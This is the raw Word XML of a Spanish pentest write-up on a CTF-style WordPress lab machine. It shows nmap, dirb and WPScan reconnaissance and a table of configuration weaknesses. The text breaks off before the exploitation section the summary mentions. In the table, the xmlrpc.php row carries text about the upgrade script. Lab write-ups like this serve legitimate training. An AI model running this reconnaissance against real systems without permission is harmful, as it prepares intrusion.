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120"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>INFORME TÉCNICO DE PENTESTING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="10" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="0" w:after="400"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Máquina: CANCELLED</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Plataforma: WhoamiLabs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="80"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="555555"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Objetivo: 172.17.0.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:after="1600"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Autor</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eleonor Arias</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:sectPr>
          <w:type w:val="nextPage"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:left="1440" w:right="1440" w:gutter="0" w:header="0" w:top="1440" w:footer="0" w:bottom="1440"/>
          <w:pgNumType w:fmt="decimal"/>
          <w:formProt w:val="false"/>
          <w:textDirection w:val="lrTb"/>
          <w:docGrid w:type="default" w:linePitch="360" w:charSpace="4096"/>
        </w:sectPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="4000" w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="555555"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Documento preparado en el marco de un ejercicio de laboratorio (CTF-style)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="6" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>1. Resumen ejecutivo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Este informe documenta el proceso de reconocimiento, enumeración y explotación realizado sobre la máquina “Cancelled” de la plataforma WhoamiLabs, con dirección IP objetivo 172.17.0.2. El objetivo expuesto corresponde a una instalación de WordPress cuya explotación permitió obtener finalmente ejecución remota de código (RCE) sobre el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A continuación se documenta cada fase del ejercicio: reconocimiento inicial, enumeración de rutas y tecnología, identificación de hallazgos de configuración, explotación y post-explotación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="6" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>2. Reconocimiento inicial</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Al acceder inicialmente por navegador, se observa el sitio web expuesto por el objetivo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="2524125"/>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334000" cy="2524125"/>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1. Vista inicial del sitio web objetivo.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>A continuación se ejecutó un escaneo de puertos:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="EDEDED"/>
        <w:spacing w:before="100" w:after="160"/>
        <w:ind w:left="200" w:right="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nmap 172.17.0.2 -sS -Pn -vv</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3905250" cy="847725"/>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3905250" cy="847725"/>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2. Resultado del escaneo: puerto 80/tcp (HTTP) abierto.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="6" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>3. Enumeración web</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.1 Descubrimiento de directorios (dirb)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Se ejecutó un escaneo de directorios sobre el servicio HTTP:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4000500" cy="3905250"/>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4000500" cy="3905250"/>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3. Resultados de dirb.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Entre las rutas identificadas se destacan las siguientes:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>http://172.17.0.2/wp-admin/css/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="3924300"/>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5334000" cy="3924300"/>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4. Listado de /wp-admin/css/.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="100"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>http://172.17.0.2/wp-admin/includes/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="4486275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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5334000" cy="4486275"/>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5. Listado de /wp-admin/includes/.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.2 Identificación de tecnología (WPScan)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:bottom w:val="single" w:sz="4" w:space="4" w:color="999999"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="999999"/>
        </w:pBdr>
        <w:shd w:val="clear" w:fill="EDEDED"/>
        <w:spacing w:before="100" w:after="160"/>
        <w:ind w:left="200" w:right="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>wpscan --url http://172.17.0.2/ -e vp,vt,u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Los resultados de WPScan confirman que el objetivo es WordPress 7.1.1, que según la información pública es una versión parcheada, por lo que los ataques directos contra vulnerabilidades conocidas del núcleo tienen dificultades para funcionar.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="320" w:after="140"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.3 Fuzzing especializado en WordPress/PHP</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="3171825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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tretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="3171825"/>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6. Resultados del fuzzing especializado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="6" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri" w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>4. Hallazgos de configuración</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>El fuzzing dirigido reveló varios recursos sensibles. Se resumen a continuación junto con su riesgo asociado:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="80" w:type="dxa"/>
          <w:left w:w="120" w:type="dxa"/>
          <w:bottom w:w="80" w:type="dxa"/>
          <w:right w:w="120" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2389"/>
        <w:gridCol w:w="6970"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389"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rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Ruta / Recurso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="697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
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Observación / Riesgo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/wp-config.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6970" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Responde 200 con length 0: el archivo existe y PHP lo ejecuta sin volcar contenido. Contiene credenciales de BD (DB_USER, DB_PASSWORD), sales de autenticación y claves. Un fallo de PHP que exponga errores podría derivar en compromiso total. Debe bloquearse a nivel de servidor web.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389"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rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/wp-config-sample.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6970"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rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Error 500 con 2482 bytes de contenido, lo que sugiere un stack trace o mensaje de error de PHP visible: fuga de información (rutas del sistema, versiones, posible configuración).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/wp-admin/install.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6970" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Comportamiento esperado (no debería invocarse directo), pero combinado con el hallazgo anterior indica que display_errors está activo en el php.ini — mala práctica en producción.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389"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rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/wp-admin/upgrade.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6970" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Responde 200 sin redirigir a wp-login.php, lo que sugiere que la instalación podría estar incompleta o el instalador seguir accesible, permitiendo a un atacante reinstalar WordPress y sobrescribir la configuración.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr/>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2389" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Consolas" w:cs="Consolas" w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/xmlrpc.php</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6970" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:fill="F5F5F5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
                <w:color w:val="1A1A1A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>El script de upgrade accesible permite en ocasiones actualizar la base de datos sin autenticación si wp-config.php apunta a una BD ya migrada: riesgo de corrupción o bypass.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="exact" w:line="276" w:before="0" w:after="160"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>También se identificó el archivo de información estándar:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="120" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5334000" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5334000" cy="971550"/>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7. /readme.html accesible.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="6" w:color="000000"/>
        </w:pBdr>
        <w:spacing w:before="480" w:after="200"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
